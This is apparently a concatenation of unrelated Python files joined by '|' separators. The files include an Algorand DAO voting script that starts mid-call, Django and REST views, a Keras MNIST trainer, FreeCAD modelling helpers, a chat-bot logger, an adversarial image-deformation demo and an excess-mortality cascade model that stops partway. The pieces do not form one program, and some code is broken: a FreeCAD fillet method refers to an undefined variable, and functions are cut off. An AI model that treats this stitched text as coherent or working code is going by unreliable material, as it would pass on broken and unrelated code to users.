1, # vote option 1 = Yes, 2 = No
10 # 10 votes
)
# wait for the voting period to end
algodao.helpers.wait_for_round(algod, waitforround)
# finalize the vote (assesses whether the vote passed or not)
deployedproposal.call_finalizevote(algod, creatoraddr, creatorprivkey)
# implement the (now passed) proposal from the DAO-side. the DAO contract will
# verify that the election has ended and that the proposal has passed in
# accordance with the requirements for this proposal type set by the DAO (i.e.,
# that it was a governance vote with over 60% voting Yes)
before = algod.account_info(receiveraddr)
deployeddao.call_implementproposal(
algod,
deployedproposal,
creatoraddr,
creatorprivkey,
accounts=[receiveraddr],
)
after = algod.account_info(receiveraddr)
print(f"Before implementing proposal, receiver account: {before}")
print(f"After implementing proposal, receiver amount: {after}")
|
from ...models.models import Model
from ...serialisers.models import ModelSerialiser
from ...permissions import IsAuthenticated, AllowNone
from ..mixins import DownloadableViewSet, SetFileViewSet, SoftDeleteViewSet
from .._UFDLBaseViewSet import UFDLBaseViewSet
class ModelViewSet(SetFileViewSet, DownloadableViewSet, SoftDeleteViewSet, UFDLBaseViewSet):
queryset = Model.objects.all()
serializer_class = ModelSerialiser
permission_classes = {
"list": IsAuthenticated,
"create": AllowNone,
"retrieve": IsAuthenticated,
"update": AllowNone,
"partial_update": AllowNone,
"destroy": AllowNone,
"set_file": AllowNone,
"delete_file": AllowNone,
"download": IsAuthenticated,
"hard_delete": AllowNone,
"reinstate": AllowNone
}
|
import keras
from keras.datasets import mnist
from keras.utils import np_utils
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.models import Sequential
import matplotlib.pyplot as plt
# Saving the model and its weights
import tempfile
from keras.models import save_model, load_model
import numpy as np
def load_data(path='mnist.npz'):
f = np.load(path)
x_train, y_train = f['x_train'], f['y_train']
x_test, y_test = f['x_test'], f['y_test']
f.close()
return (x_train, y_train), (x_test, y_test)
# Load the dataset
(x_train, y_train), (x_test, y_test) = load_data()
print(x_train.shape,y_train.shape,x_test.shape,y_test.shape)
# plot 4 images as gray scale
# plt.subplot(221)
# print(y_train[4545],y_train[1],y_train[2],y_train[3])
# plt.imshow(x_train[4545], cmap=plt.get_cmap('gray'))
# plt.subplot(222)
# plt.imshow(x_train[1], cmap=plt.get_cmap('gray'))
# plt.subplot(223)
# plt.imshow(x_train[2], cmap=plt.get_cmap('gray'))
# plt.subplot(224)
# plt.imshow(x_train[3], cmap=plt.get_cmap('gray'))
# # show the plot
# plt.show()
X_train = x_train.reshape(x_train.shape[0], 784)
X_test = x_test.reshape(x_test.shape[0],784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
# print(X_train.shape,X_test.shape)
# print(X_train.dtype,X_test.dtype)
# Normalize pixel values to [0, 1]
X_train /= 255
X_test /= 255
# One-hot encode the labels
Y_train = np_utils.to_categorical(y_train, 10)
Y_test = np_utils.to_categorical(y_test, 10)
# Initialize the sequential model:
model = Sequential()
#model.add(Dense(10,input_dim=784))
#model.add(Activation('softmax'))
model.add(Dense(128,input_dim=784,activation='relu'))
model.add(Dense(128,activation='relu'))
model.add(Dense(10,activation='softmax'))
#model.summary()
model.compile(optimizer=keras.optimizers.SGD(),
              loss='categorical_crossentropy',
              metrics=['accuracy'])
# Train the model (nb_epoch was renamed to epochs in Keras 2)
model.fit(X_train, Y_train, epochs=20, batch_size=128, verbose=1, validation_split=0.2)
model.save('mnist_kerasModel.h5')
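# Reload the saved model and sanity-check it (a sketch; assumes
# 'mnist_kerasModel.h5' was just written by model.save above)
restored = load_model('mnist_kerasModel.h5')
preds = restored.predict(X_test[:5])
print('predicted digits:', np.argmax(preds, axis=1))
print('true digits:', y_test[:5])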
# Test the model
print('\nTesting ------------')
loss, accuracy = model.evaluate(X_test, Y_test,verbose=1)
print('test loss: ', loss)
print('test accuracy: ', accuracy) |
import uuid
import time as processTiming
from django.http import JsonResponse
from rest_framework.views import APIView
from ..fetch_busapi import FetchBusApi
# API to fetch bus stops, used by frontend.
class BusStopsLocations(APIView):
    # note: FetchBusApi() in the default argument is evaluated once at import
    # time, so a single instance is reused across requests
    def get(self, request, bus_stops_locations=FetchBusApi()):
startTime = processTiming.time()
call_uuid = uuid.uuid4()
ID = "BUS_STOPS_INFO"
result = bus_stops_locations.bus_stand_locations()
return JsonResponse(
{
"API_ID": ID,
"CALL_UUID": call_uuid,
"DATA": {
"RESULT": result
},
"TIMESTAMP": "{} seconds".format(float(round(processTiming.time() - startTime, 2)))}
)
# API to fetch bus timings at stops, used by frontend. The results consist of bus timings for all bus trips.
class BusTripsTimings(APIView):
    def get(self, request, bus_stops_timings=FetchBusApi()):
startTime = processTiming.time()
call_uuid = uuid.uuid4()
ID = "BUS_STOPS__TIME_INFO"
result = bus_stops_timings.bus_trips_timings()
return JsonResponse(
{
"API_ID": ID,
"CALL_UUID": call_uuid,
"DATA": {
"RESULT": result
},
"TIMESTAMP": "{} seconds".format(float(round(processTiming.time() - startTime, 2)))}
)
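# Shape of a successful response (a sketch; the RESULT payload depends entirely
# on FetchBusApi):
# {
#     "API_ID": "BUS_STOPS_INFO",
#     "CALL_UUID": "<uuid4>",
#     "DATA": {"RESULT": ...},
#     "TIMESTAMP": "0.12 seconds"
# }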
|
from scrapy.crawler import CrawlerProcess
from .spiders import amazon_scraper
# CrawlerProcess.crawl() expects a Spider subclass (or its name); this code
# assumes `amazon_scraper` resolves to one.
process = CrawlerProcess()
process.crawl(amazon_scraper)
process.start()  # blocks until the crawl finishes
|
import sys
FREECADPATH = '/usr/lib/freecad/lib'
sys.path.append(FREECADPATH)
import FreeCAD, FreeCADGui, Part, PartGui
##############################
## LIBRARIES
##############################
SCREWS = {
## name, screw dim, head radius, hole radius, spacer dim
## screw dim: angle, radius, height, thickness, measurement
## spacer dim: number of sides, poly radius, inner hole radius (w/o thread)
## screw 6-32
"6_32_0p25": ([360, 4.0/64, 0.25, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
"6_32_0p50": ([360, 4.0/64, 0.50, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
"6_32_0p75": ([360, 4.0/64, 0.75, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
"6_32_1p00": ([360, 4.0/64, 1.00, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
## screw 4-40
"4_40_0p25": ([360, 3.0/64, 0.25, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch")),
"4_40_0p50": ([360, 3.0/64, 0.50, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch")),
"4_40_0p75": ([360, 3.0/64, 0.75, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch")),
"4_40_1p00": ([360, 3.0/64, 1.00, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch"))
}
##===================================================
##
## FUNCTIONS
##
##===================================================
########################################
## Fuser
########################################
def fuser(fusion_name, base, tool):
docGctive = FreeCADGui.ActiveDocument
FreeCAD.Console.PrintMessage("===============FUSER=============\n")
FreeCAD.Console.PrintMessage("Fuse: " + fusion_name + "\n")
FreeCAD.Console.PrintMessage("Base: %s, %s\n" % (base.Name, base.Label))
FreeCAD.Console.PrintMessage("Tool: %s, %s\n" % (tool.Name, tool.Label))
FreeCAD.activeDocument().addObject("Part::Fuse", fusion_name)
FreeCAD.activeDocument().getObject(fusion_name).Base = base
FreeCAD.activeDocument().getObject(fusion_name).Tool = tool
FreeCADGui.activeDocument().hide(base.Name)
FreeCADGui.activeDocument().hide(tool.Name)
FreeCAD.Console.PrintMessage("Hide: %s, %s\n" % (base.Name, tool.Name))
docGctive.getObject(fusion_name).ShapeColor=docGctive.getObject(base.Name).ShapeColor
docGctive.getObject(fusion_name).DisplayMode=docGctive.getObject(base.Name).DisplayMode
FreeCAD.Console.PrintMessage("============END FUSER=============\n")
########################################
## Cutter
########################################
def cutter(cut_name, base, tool):
docGctive = FreeCADGui.ActiveDocument
FreeCAD.Console.PrintMessage("===============CUTTER=============\n")
FreeCAD.Console.PrintMessage("Cut: " + cut_name + "\n")
FreeCAD.Console.PrintMessage("Base: %s, %s\n" % (base.Name, base.Label))
FreeCAD.Console.PrintMessage("Tool: %s, %s\n" % (tool.Name, tool.Label))
FreeCAD.activeDocument().addObject("Part::Cut", cut_name)
FreeCAD.activeDocument().getObject(cut_name).Base = base
FreeCAD.activeDocument().getObject(cut_name).Tool = tool
FreeCADGui.activeDocument().hide(base.Name)
FreeCADGui.activeDocument().hide(tool.Name)
FreeCAD.Console.PrintMessage("Hide: %s, %s\n" % (base.Name, tool.Name))
docGctive.getObject(cut_name).ShapeColor=docGctive.getObject(base.Name).ShapeColor
docGctive.getObject(cut_name).DisplayMode=docGctive.getObject(base.Name).DisplayMode
FreeCAD.Console.PrintMessage("============END CUTTER=============\n")
########################################
## Placer
########################################
def placer(x,y,z,a,ax,ay,az):
FreeCAD.Console.PrintMessage("===============PLACER=============\n")
msg = "x: %.2f, y: %.2f, z: %.2f, a: %.2f, ax: %.2f, ay: %.2f, az: %.2f\n"
FreeCAD.Console.PrintMessage(msg % (x, y, z, a, ax, ay, az))
p = FreeCAD.Placement(FreeCAD.Vector(x, y, z), FreeCAD.Rotation(a, ax, ay, az))
FreeCAD.Console.PrintMessage("============END PLACER=============\n")
return p
##===================================================
##
## CLASSES
##
##===================================================
########################################
##
## FreeCAD related parameters
##
########################################
class CADobj():
""" Basic CAD object """
def __init__(self,docname,objtype,objname):
self.doc = docname
self.obj = objtype
self.name = objtype[6:]+"_"+objname
self.lx = 0
self.ly = 0
self.lz = 0
self.weight = 0
def cprint(self, strin):
""" Print to CAD console """
FreeCAD.Console.PrintMessage(strin + "\n")
def show(self):
""" Print info for this object """
self.cprint(self.name + ", in doc: " + self.doc)
self.cprint(self.name + ", loc: %.2f %.2f %.2f" % (self.lx, self.ly, self.lz))
self.cprint(self.name + ", weight: %.2f" % self.weight)
def select(self):
""" Update current document to allow obj selection """
        try:
            FreeCAD.getDocument(self.doc)
        except NameError:
self.cprint(self.name + ", Need new doc " + self.doc)
FreeCAD.newDocument(self.doc)
self.cprint(self.name + ", move to doc " + self.doc)
FreeCAD.setActiveDocument(self.doc)
self.docA = FreeCAD.ActiveDocument
self.docG = FreeCADGui.ActiveDocument
def create(self):
""" Create the obj in CAD """
self.cprint("============ CREATE ==============")
self.cprint(self.name + ", create this obj")
self.select()
self.docA.addObject(self.obj, self.name)
self.docA.recompute()
self.objA = self.docA.getObject(self.name)
self.objG = self.docG.getObject(self.name)
self.cprint("============END CREATE=============")
def loc(self, x,y,z):
""" Modify location of obj in CAD """
self.cprint(self.name + ", move obj to %.2f %.2f %.2f" % (x,y,z))
self.objA.Placement = FreeCAD.Placement(FreeCAD.Vector(x,y,z),FreeCAD.Rotation(0,0,0,1))
self.lx = x
self.ly = y
self.lz = z
def color(self,r,g,b):
""" Modify color in CAD """
self.objG.ShapeColor = (r,g,b)
########################################
##
## Any 3D object, extension of CAD object
##
########################################
class obj3d(CADobj):
""" Basic shape class for CAD drawing """
def __init__(self,doc,t,n,x,y,z,th):
CADobj.__init__(self, doc, t, n)
self.dx = x
self.dy = y
self.dz = z
self.thick = th
def fillet(self, arr):
name_org = self.name
self.obj = "Part::Fillet"
self.name = obj[6:]+"_"+self.name
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", fillets: ")
FreeCAD.Console.PrintMessage(arr)
self.cprint("")
CADobj.create(self)
self.objA.Base = self.docA.getObject(name_org)
self.objA.Edges = arr
self.docG.getObject(name_org).Visibility = False
def hollow(self, arr):
self.cprint("============HOLLOW=============\n")
name_org = self.name
self.thick = arr[0]
self.obj = "Part::Thickness"
self.name = self.obj[6:]+"_"+self.name
CADobj.create(self)
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", faces: ")
FreeCAD.Console.PrintMessage(arr[3])
self.cprint("")
self.objA.Faces = (self.docA.getObject(name_org), arr[3])
self.objA.Value = self.thick
self.objA.Mode = arr[1]
self.objA.Join = arr[2]
self.objA.Intersection = False
self.objA.SelfIntersection = False
self.docA.recompute()
self.docG.getObject(name_org).Visibility = False
self.cprint("============END HOLLOW=============\n")
def extrude(self, arr):
self.cprint("============EXTRUDE=============\n")
name_org = self.name
self.obj = "Part::Extrusion"
self.name = self.obj[6:]+"_"+self.name
CADobj.create(self)
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", faces: ")
FreeCAD.Console.PrintMessage(arr)
self.cprint("")
self.objA.Base = self.docA.getObject(name_org)
self.objA.Dir = arr[0]
self.objA.Solid = arr[1]
self.objA.TaperAngle = arr[2]
self.docA.recompute()
self.docG.getObject(name_org).Visibility = False
self.cprint("============END EXTRUDE=============\n")
def cut(self, name_cut):
self.cprint("============CUT=============\n")
name_org = self.name
self.obj = "Part::Cut"
self.name = self.obj[6:]+"_"+self.name
CADobj.create(self)
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", cut from: " + name_cut)
self.objA.Base = self.docA.getObject(name_org)
self.objA.Tool = self.docA.getObject(name_cut)
self.docG.hide(name_org)
self.docG.hide(name_cut)
self.objG.ShapeColor = self.docG.getObject(name_org).ShapeColor
self.objG.DisplayMode = self.docG.getObject(name_org).DisplayMode
self.cprint("============END CUT=============\n")
########################################
##
## Box representation
##
########################################
class box(obj3d):
""" Box for CAD drawing """
def __init__(self,doc,n,dim):
x = dim[0] if (dim[4] == "mm") else dim[0]*25.4
y = dim[1] if (dim[4] == "mm") else dim[1]*25.4
z = dim[2] if (dim[4] == "mm") else dim[2]*25.4
t = dim[3] if (dim[4] == "mm") else dim[3]*25.4
obj3d.__init__(self, doc, "Part::Box", n,x,y,z,t)
def show(self):
""" Print dimension of the box """
CADobj.show(self)
self.cprint("============SHOW BOX=============\n")
msg = "%s, (in mm) length: %.2f, width: %.2f, depth: %.2f"
self.cprint(msg % (self.name, self.dx, self.dy, self.dz))
self.cprint("============END SHOW=============\n")
def reshape(self):
""" Update its dimension in CAD """
self.cprint("============RESHAPING=============\n")
self.cprint("Re-shaping " + self.name)
CADobj.select(self)
self.cprint("Obj name " + self.name + ", " + self.objA.Name)
self.objA.Length = self.dx
self.objA.Width = self.dy
self.objA.Height = self.dz
self.cprint("Done re-shaping " + self.name)
self.cprint("============END RESHAPING=============\n")
def create(self):
""" Create this obj in CAD """
self.cprint("Creating "+ self.name)
CADobj.create(self)
self.reshape()
self.docG.sendMsgToViews("ViewFit")
self.cprint("Done creating " + self.name)
########################################
##
## Cylinder representation
##
########################################
class cylinder(obj3d):
""" Cylinder for CAD drawing """
def __init__(self,doc,n,dim):
x = dim[0]
y = dim[1] if (dim[4] == "mm") else dim[1]*25.4
z = dim[2] if (dim[4] == "mm") else dim[2]*25.4
t = dim[3] if (dim[4] == "mm") else dim[3]*25.4
obj3d.__init__(self, doc, "Part::Cylinder", n,x,y,z,t)
def show(self):
""" Print dimension of the box """
CADobj.show(self)
self.cprint("============SHOW CYLINDER=============\n")
msg = "%s, (in mm) angle: %.2f, radius: %.2f, height: %.2f, thick: %.2f"
self.cprint(msg % (self.name, self.dx, self.dy, self.dz, self.thick))
self.cprint("============END SHOW=============\n")
def reshape(self):
""" Update its dimension in CAD """
self.cprint("============RESHAPE=============\n")
self.cprint("Re-shaping " + self.name)
CADobj.select(self)
self.objA.Angle = self.dx
self.objA.Radius = self.dy
self.objA.Height = self.dz
self.cprint("Done re-shaping obj")
self.cprint("============END RESHAPE=============\n")
def create(self):
""" Create this obj in CAD """
self.cprint("Creating obj " + self.name)
CADobj.create(self)
self.reshape()
self.docG.sendMsgToViews("ViewFit")
self.cprint("Done creating obj")
########################################
##
## Polygon representation
##
########################################
class polygon(obj3d):
""" Polygon for CAD drawing """
def __init__(self,doc,n,dim):
x = dim[0]
y = dim[1] if (dim[4] == "mm") else dim[1]*25.4
z = dim[2] if (dim[4] == "mm") else dim[2]*25.4
t = dim[3] if (dim[4] == "mm") else dim[3]*25.4
obj3d.__init__(self, doc, "Part::RegularPolygon", n,x,y,z,t)
def show(self):
""" Print dimension of the polygon """
self.cprint("============SHOW POLYGON=============\n")
CADobj.show(self)
msg = "%s, (in mm) num_sides: %.2f, radius: %.2f, height: %.2f, thick: %.2f"
self.cprint(msg % (self.name, self.dx, self.dy, self.dz, self.thick))
self.cprint("============END SHOW=============\n")
def reshape(self):
""" Update its dimension in CAD """
self.cprint("============RESHAPE=============\n")
self.cprint("Re-shaping " + self.name)
CADobj.select(self)
self.objA.Polygon = self.dx
self.objA.Circumradius = self.dy
self.cprint("Done Re-shaping obj")
self.cprint("============END RESHAPE=============\n")
def create(self):
""" Create this obj in CAD """
self.cprint("Creating obj " + self.name)
CADobj.create(self)
self.reshape()
self.docG.sendMsgToViews("ViewFit")
self.cprint("Done creating obj")
|
import sublime_plugin, sublime
SETTINGS_FILE = 'Software.sublime_settings'
def getValue(key, defaultValue):
    # Load lazily on each call: at import time the Sublime API may not be
    # ready, so a module-level load_settings() can return an empty object.
    settings = sublime.load_settings(SETTINGS_FILE)
    return settings.get(key, defaultValue)
def setValue(key, value):
    settings = sublime.load_settings(SETTINGS_FILE)
    settings.set(key, value)
    # Persist to disk; set() alone only updates the in-memory settings.
    sublime.save_settings(SETTINGS_FILE)
|
import math
from weather import Weather
from mic import *
WORDS = ["weather", "temperature", "outside", "out there", "forecast"]
m = Mic()
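# Hedged helper (added for clarity; not part of the original module): the
# conversion below implements C = (F - 32) * 5/9, which the original
# approximated with the magic constant 0.555555.
def fahrenheit_to_celsius(f):
    """Convert a temperature from Fahrenheit to Celsius."""
    return (f - 32) * 5.0 / 9.0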
def handle(text):
    weather = Weather()
    # The original also looked up WOEID 91982014 and immediately discarded
    # the result; only the by-location lookup is used.
    lookup = weather.lookup_by_location('ottawa')
    condition = lookup.condition()
    condition['temp'] = str(math.ceil(fahrenheit_to_celsius(int(condition['temp']))))
    m.say("It is currently " + condition['temp'] + " degrees Celsius and the condition is " + condition['text']) |
import os
import numpy as np
from util import read_data
from model import ImplicitALS
from evaluation import evaluate
import fire
def main(train_fn, test_fn=None, r=10, alpha=100, n_epoch=15, beta=1e-3,
cutoff=500, n_user_items=None, model_out_root=None,
model_name='wrmf'):
""""""
print('Loading data...')
d, y = read_data(train_fn, shape=n_user_items)
if test_fn is not None:
dt, yt = read_data(test_fn, shape=d.shape)
print('Fit model (r={:d})!'.format(r))
model = ImplicitALS(r, beta, alpha, n_epoch)
model.fit(d)
if test_fn is not None:
print('Evaluate!')
res, (trues, preds) = evaluate(model, y, yt, cutoff)
print(res)
print('Save Model...')
if model_out_root is None:
    model_out_root = os.path.join(os.getcwd(), 'data')
# Ensure the output directory exists before saving (the original only
# created it when an explicit path was supplied).
if not os.path.exists(model_out_root):
    os.makedirs(model_out_root)
np.save(
os.path.join(model_out_root, '{}_U.npy'.format(model_name)),
model.user_factors
)
np.save(
os.path.join(model_out_root, '{}_V.npy'.format(model_name)),
model.item_factors
)
if __name__ == "__main__":
fire.Fire(main)
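# Example invocation (a sketch: python-fire exposes main()'s keyword
# arguments as command-line flags; the script name here is a placeholder):
#
#   python wrmf_train.py ./train.csv --test_fn ./test.csv --r 20 --alpha 50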
|
import bot
class Module(bot.Module):
def __init__(self, config):
super().__init__(config)
self.file = None
if 'file' in self.config:
self.file = open(self.config['file'], 'a')
def print(self, *args):
    print(*args)
    if self.file is not None:
        # Mirror the console line to the log file, newline-terminated.
        self.file.write(' '.join(map(str, args)) + '\n')
        self.file.flush()
async def on_ready(self):
self.print('log: ready')
async def on_message(self, message):
    self.print('log: on_message', f'#{message.channel.name} <{message.author.name}> {message.content}')
async def on_any_message(self, message):
    self.print('log: on_any_message', f'#{message.channel.name} <{message.author.name}> {message.content}')
async def on_occasion(self):
if self.config.get('occasions'):
self.print('log: on_occasion')
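# Usage sketch (hypothetical; assumes the surrounding bot framework
# constructs modules with a plain dict config):
#
#   log_module = Module({'file': 'bot.log', 'occasions': True})
#   # The framework then awaits on_ready/on_message/on_occasion as the
#   # corresponding events fire.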
|
import numpy as np
import matplotlib.pyplot as plt
import os
import PIL.Image as Image
import torch
from torch.autograd import Variable
import torchvision.models as models
import torchvision.transforms as transforms
from deformation import ADef
from vector_fields import draw_vector_field
from write_results import write_results
def demo_mnist(batch_size, sigma):
    # Note: despite the name, this demo runs an ImageNet model (Inception v3),
    # not MNIST; batch_size is currently unused.
    path_to_resources = 'resources/'
    with open(os.path.join(path_to_resources, 'synset_words.txt'), 'r') as words_file:
        Words = words_file.read().split('\n')
# Image is WIDTH x WIDTH x 3
WIDTH = 299
#net = models.resnet101(pretrained=True) # Use WIDTH = 224
net = models.inception_v3(pretrained=True) # Use WIDTH = 299
net.eval() # Turn off dropout and such
print('Model: ' + type(net).__name__)
# Image with min(width,height) >= WIDTH.
im_name = path_to_resources + 'im0.jpg'
image_PIL = Image.open(im_name)
print('Image: ' + im_name)
# Create tensor compatible with 'net'
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
normalize = transforms.Normalize( mean=mean, std=std )
image = transforms.Compose([
transforms.Resize(WIDTH),
transforms.CenterCrop(WIDTH),
transforms.ToTensor(),
normalize
])(image_PIL)
# 'net' accepts batches of images as Variable.
x = Variable( torch.unsqueeze( image, 0 ) )
Fx = net(x)
maxval, label = torch.max( Fx.data, 1 )
label = label.item()
# ADef config
test_case = 'imagenet'
candidates = 1
max_iter = 100
max_norm = np.inf
# sigma (the ADef smoothing parameter) is taken directly from the function argument.
overshoot = 1.1
strong_targets = False
# Deform image using ADef
def_image, def_data = ADef( image, net, ind_candidates=candidates,
max_norm=max_norm, max_iter=max_iter,
smooth=sigma, overshoot=overshoot,
targeting=strong_targets )
def_image = def_image[0]
def_label = def_data['deformed_labels'][0]
vec_field = def_data['vector_fields'][0]
# # Get plottable images
# unnormalize = transforms.Compose([
# transforms.Normalize( [0,0,0], 1/std ),
# transforms.Normalize( -mean, [1,1,1] )
# ])
# def_image_PIL = transforms.Compose([
# unnormalize,
# transforms.ToPILImage()
# ])( def_image )
# image_PIL = transforms.Compose([
# unnormalize,
# transforms.ToPILImage()
# ])( image )
# Size of perturbation:
pertl2 = np.linalg.norm( image.numpy().ravel() - def_image.numpy().ravel(), ord=2 )
pertlinf = np.linalg.norm( image.numpy().ravel() - def_image.numpy().ravel(), ord=np.inf )
# Size of vector field:
vecnorms = np.sqrt( vec_field[:,:,0]**2 + vec_field[:,:,1]**2 ).numpy()
vfl2 = np.linalg.norm( vecnorms.ravel(), ord=2 )
vfT = np.linalg.norm( vecnorms.ravel(), ord=np.inf )
# # Plot results
# fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2,2)
# fig.set_size_inches(7,8)
#
# ax1.imshow( image_PIL )
# ax2.imshow( def_image_PIL )
# bg_image = np.array(def_image_PIL)//2 + 128
# ax3.imshow( bg_image )
# draw_vector_field( ax3, vec_field, amp=4, tol=0.01 )
# pert = 1.*np.array(def_image_PIL) - 1.*np.array(image_PIL)
# ax4.imshow( pert )
#
# original_title = Words[label][10:].split(',')[0]
# deformed_title = Words[def_label][10:].split(',')[0]
# ax1.set_title( 'Original: ' + original_title )
# ax2.set_title( 'Deformed: ' + deformed_title )
# ax3.set_title( 'Vector field' )
# ax4.set_title( 'Perturbation' )
#
# ax3.set_xlabel(r'$\ell^2$-norm: %.3f, $T$-norm: %.3f' %( vfl2, vfT ) )
# ax4.set_xlabel(r'$\ell^2$-norm: %.3f, $\ell^\infty$-norm: %.3f' %( pertl2, pertlinf ) )
#
# plt.show()
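# Entry-point sketch (added for illustration; batch_size is currently
# unused and sigma is ADef's smoothing parameter):
#
# if __name__ == '__main__':
#     demo_mnist(batch_size=1, sigma=1.0)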
|
"""
Logit ratio analysis between excess mortality and covid deaths
- use covaraite idr_lagged
- pre-analysis getting prior
- cascade model infer location variation
"""
from typing import List, Dict, Union
from pathlib import Path
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from regmod.data import Data
from regmod.variable import Variable, SplineVariable
from regmod.utils import SplineSpecs
from regmod.prior import UniformPrior, SplineUniformPrior, SplineGaussianPrior
from emmodel.model import ExcessMortalityModel
from emmodel.variable import ModelVariables
from emmodel.cascade import CascadeSpecs, Cascade
# data file path
data_path = Path("./examples/data_debug/2020-04-22/stage2_input.csv")
# result folder
results_path = Path("./examples/results_debug")
# define all variables
intercept_variable = Variable("intercept")
idr_spline_specs = SplineSpecs(
knots=np.linspace(0.0, 1.0, 5),
degree=2,
knots_type="rel_domain",
include_first_basis=False
)
idr_variable = SplineVariable("idr_lagged",
spline_specs=idr_spline_specs,
priors=[SplineUniformPrior(order=1, lb=-np.inf, ub=0.0),
SplineGaussianPrior(order=1, mean=0.0, sd=1e-4,
domain_lb=0.4, domain_ub=1.0)])
time_spline_specs = SplineSpecs(
knots=np.linspace(0.0, 1.0, 10),
degree=2,
knots_type="rel_domain",
include_first_basis=False,
r_linear=True
)
time_variable = SplineVariable("time_id",
spline_specs=time_spline_specs,
priors=[SplineGaussianPrior(order=1, mean=0.0, sd=1e-4,
domain_lb=0.9, domain_ub=1.0, size=2)])
# create variables for IDR global model
idr_model_variables = ModelVariables(
[intercept_variable,
idr_variable],
model_type="Linear"
)
# create variables for cascade
cascade_model_variables = ModelVariables(
[intercept_variable,
idr_variable,
time_variable],
model_type="Linear"
)
# construct the cascade model specification
cascade_specs = CascadeSpecs(
model_variables=[cascade_model_variables],
prior_masks={"intercept": [np.inf],
"idr_lagged": [1.0]*idr_variable.size,
"time_id": [1.0]*(time_variable.size - 1) + [0.1]},
level_masks=[1.0, 1.0, 10.0, 10.0],
col_obs="logit_ratio"
)
# sample setting
num_samples = 1000
np.random.seed(123)
# prediction function
def predict(df_pred: pd.DataFrame,
model: ExcessMortalityModel,
col_pred: str = "logit_ratio") -> pd.DataFrame:
df_pred = df_pred.copy()
pred = np.zeros(df_pred.shape[0])
for i in range(model.num_models):
model.data[i].attach_df(df_pred)
pred = pred + model.models[i].params[0].get_param(
model.results[i]["coefs"], model.data[i]
)
model.data[i].detach_df()
df_pred[col_pred] = pred
return df_pred
# link cascade model
def link_cascade_models(root_model: Cascade,
leaf_models: List[List[Cascade]],
model_structure: Union[Dict, List]):
if isinstance(model_structure, dict):
sub_model_names = model_structure.keys()
else:
sub_model_names = model_structure
sub_models = [model for model in leaf_models[0] if model.name in sub_model_names]
root_model.add_children(sub_models)
if isinstance(model_structure, dict):
for model in sub_models:
link_cascade_models(model, leaf_models[1:], model_structure[model.name])
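# Illustration (hypothetical location names) of the nested structure this
# function expects: dicts link recursively level by level, and a list marks
# the final level to link.
#
# example_structure = {
#     "Super Region A": {
#         "Region A1": {"USA": ["USA_WA", "USA_CA"]},
#     },
# }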
# plot result
def plot_model(df, pred_dfs, locations) -> plt.Axes:
_, ax = plt.subplots(figsize=(8, 5))
ax.scatter(df.time_id, df.logit_ratio, color="gray")
colors = ["red", "#E88734", "#008080", "#02639B", "#172128"]
for i, location in enumerate(locations):
if location not in pred_dfs:
continue
pred_dfs[location].sort_values("time_id", inplace=True)
ax.plot(pred_dfs[location].time_id,
pred_dfs[location].logit_ratio,
color=colors[i], label=location)
if len(locations) == 1:
index = [True]*df.shape[0]
elif len(locations) == 2:
index = df.super_region_name == locations[-1]
elif len(locations) == 3:
index = df.region_name == locations[-1]
else:
index = df.ihme_loc_id == locations[-1]
ax.scatter(df.time_id[index], df.logit_ratio[index], color="#38ACEC")
ax.set_xlabel("time_id")
ax.set_ylabel("logit_ratio")
ax.set_title(locations[-1])
ax.legend()
return ax
def sample_coefs(cmodel: Cascade) -> pd.DataFrame:
model = cmodel.model
coefs = np.random.multivariate_normal(
mean=model.results[-1]["coefs"],
cov=model.results[-1]["vcov"],
size=num_samples
)
return pd.DataFrame(
coefs,
columns=[variable.name
for variable in model.models[-1].params[0].variables]
)
def main():
# load data
df_all = pd.read_csv(data_path)
df_all = df_all[df_all.include].reset_index(drop=True)
national_index = df_all.ihme_loc_id.str.len() == 3
df_national = df_all[national_index].reset_index(drop=True)
df_subnational = df_all[~national_index].reset_index(drop=True)
df = df_national
# create results folder
if not results_path.exists():
results_path.mkdir()
# Fit global IDR model
idr_model = ExcessMortalityModel(df, [idr_model_variables], col_obs="logit_ratio")
idr_model.run_models()
# attach data to create spline
data = Data(
col_obs="logit_ratio",
col_covs=[intercept_variable.name,
idr_variable.name,
time_variable.name]
)
data.df = df
idr_variable.check_data(data)
time_variable.check_data(data)
# fix idr coefficients
coefs = idr_model.results[0]["coefs"][1:]
idr_variable.add_priors(UniformPrior(lb=coefs, ub=coefs))
# getting location structure
location_structure = {}
for super_region in df.super_region_name.unique():
regions = df[df.super_region_name == super_region].region_name.unique()
location_structure[super_region] = {}
for region in regions:
nationals = list(
df_national[df_national.region_name == region].ihme_loc_id.unique()
)
location_structure[super_region][region] = {}
for national in nationals:
subnational_index = df_subnational.ihme_loc_id.str.startswith(national)
location_structure[super_region][region][national] = list(
df_subnational.ihme_loc_id[subnational_index].unique()
)
# construct cascade model
# global model
global_model = Cascade(df, cascade_specs, level_id=0, name="Global")
# super region model
super_region_models = [
Cascade(df[df.super_region_name == super_region].reset_index(drop=True),
cascade_specs,
level_id=1,
name=super_region)
for super_region in df.super_region_name.unique()
]
# region model
region_models = [
Cascade(df[df.region_name == region].reset_index(drop=True),
cascade_specs,
level_id=2,
name=region)
for region in df.region_name.unique()
]
# national model
national_models = [
Cascade(df_national[df_national.ihme_loc_id == national].reset_index(drop=True),
cascade_specs,
level_id=3,
name=national)
for national in df_national.ihme_loc_id.unique()
]
# subnational model
subnational_models = [
Cascade(df_subnational[df_subnational.ihme_loc_id == subnational].reset_index(drop=True),
cascade_specs,
level_id=4,
name=subnational)
